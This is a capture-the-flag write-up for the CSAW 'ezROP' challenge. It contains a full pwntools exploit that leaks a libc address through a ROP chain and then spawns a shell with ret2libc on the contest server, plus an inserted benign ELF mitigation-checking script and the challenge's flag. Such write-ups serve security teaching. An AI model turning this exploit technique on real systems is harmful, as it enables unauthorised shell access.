0x0 Introduction

This is a simple buffer overflow challenge, but I wrote it in a reversed way :)

nc pwn.chal.csaw.io 5002

Files: share.zip
0x1 Mitigation

```
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
```
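The mitigation table above is what a checksec-style tool reports. As an added example (not part of the writeup, and not the tool the author used), here is a small pure-Python reader that derives two of those rows directly from the ELF64 header and program headers: PIE is `e_type == ET_DYN`, and NX is a `PT_GNU_STACK` segment without the `PF_X` flag. The canary row is approximated by a crude scan for the `__stack_chk_fail` symbol name, which is an assumption about how the binary was built rather than a full symbol-table walk. `build_minimal_elf` constructs a headers-only fixture so the check runs offline; it is not a loadable binary.

```python
import struct
import sys

# ELF64 constants from the ELF specification
ELF_MAGIC = b"\x7fELF"
ET_EXEC = 2             # fixed load address: "No PIE (0x400000)"
ET_DYN = 3              # position-independent executable (or shared object)
PT_GNU_STACK = 0x6474E551
PF_X = 0x1


def elf_mitigations(data: bytes) -> dict:
    """Report PIE / NX / canary hints for a little-endian ELF64 image.

    NX is enabled when a PT_GNU_STACK program header exists and lacks PF_X;
    if the header is missing, the loader falls back to an executable stack,
    so that case is reported as NX disabled.
    """
    if len(data) < 64 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only little-endian ELF64 is handled here")

    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    gnu_stack_flags = None
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from("<II", data, off)
        if p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags

    nx = gnu_stack_flags is not None and not (gnu_stack_flags & PF_X)
    return {
        "pie": e_type == ET_DYN,
        "nx": nx,
        "gnu_stack_present": gnu_stack_flags is not None,
        # crude heuristic (assumption): the symbol name only appears when
        # the compiler emitted stack-protector checks
        "canary_symbol_present": b"__stack_chk_fail" in data,
    }


def build_minimal_elf(e_type: int, stack_flags) -> bytes:
    """Constructed fixture: a 64-byte ELF64 header plus an optional
    PT_GNU_STACK program header (stack_flags=None omits it)."""
    phnum = 0 if stack_flags is None else 1
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELF64, LE, v1
    hdr = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        e_type, 0x3E, 1,        # e_type, e_machine = x86-64, e_version
        0x401000,               # e_entry
        64 if phnum else 0,     # e_phoff: program headers follow the header
        0, 0,                   # e_shoff, e_flags
        64, 56, phnum,          # e_ehsize, e_phentsize, e_phnum
        64, 0, 0,               # e_shentsize, e_shnum, e_shstrndx
    )
    if phnum:
        hdr += struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0)
    return hdr


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    with open(path, "rb") as f:
        for key, val in elf_mitigations(f.read()).items():
            print(f"{key:>22}: {val}")
```

Run it as `python3 elfcheck.py ./ezROP` to compare against the table above; a `pie: False`, `nx: True` result matches the "No PIE" and "NX enabled" rows, which is exactly the combination that lets a stack overflow be turned into a fixed-address ROP chain rather than a shellcode injection.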
0x2 Vulnerability

We have a 0x9c byte buffer overflow in vuln().

With no PIE and no canary, we have direct control of RIP.
Therefore, build a ROP chain to leak a libc address, then perform a ret2libc to get a shell.
0x3 Exploit

```python
from pwn import *

exe = ELF("ezROP")
exe_rop = ROP(exe)
libc = ELF("libc6_2.31-0ubuntu9.9_amd64.so")
context.binary = exe


def log_print(*msg):
    log.info(" ".join(map(str, msg)))


lp = log_print


def start():
    if args.LOCAL:
        r = process([exe.path])
        if args.R2:
            input("Wait r2 attach")
    else:
        r = remote("pwn.chal.csaw.io", 5002)
    return r


ret_addr = exe_rop.find_gadget(['ret'])[0]   # stack alignment before calls
pop_rdi_ret_addr = 0x00000000004015a3
pop_rsi_r14_ret_addr = 0x00000000004015a1

io = start()

# Stage 1: overwrite the saved return address (offset 0x70 + 0x8) with a chain
# that calls printf(printf@got) to leak the libc address, then returns to main.
io.sendafter(b"name?\n", flat({
    0: b'\n',
    8: b'AAAAAAAA',
    0x70 + 0x8: [
        ret_addr,
        pop_rdi_ret_addr,
        exe.got["printf"],
        exe.plt["printf"],
        ret_addr,
        exe.sym["main"],
    ]
}))
io.recvuntil(b"22!\n")
libc.address = int.from_bytes(io.recvuntil(b"My", drop=True), "little") - libc.sym["printf"]
print(hex(libc.address))

# Stage 2: ret2libc, system("/bin/sh")
io.sendafter(b"name?\n", flat({
    0: b'\n',
    8: b'AAAAAAAA',
    0x70 + 0x8: [
        ret_addr,
        pop_rdi_ret_addr,
        next(libc.search(b"/bin/sh")),
        libc.sym["system"],
    ]
}))
io.interactive()
```
0x4 Flag

flag{53bb4218b851affb894fad151652dc333a024990454a0ee32921509a33ebbeb4}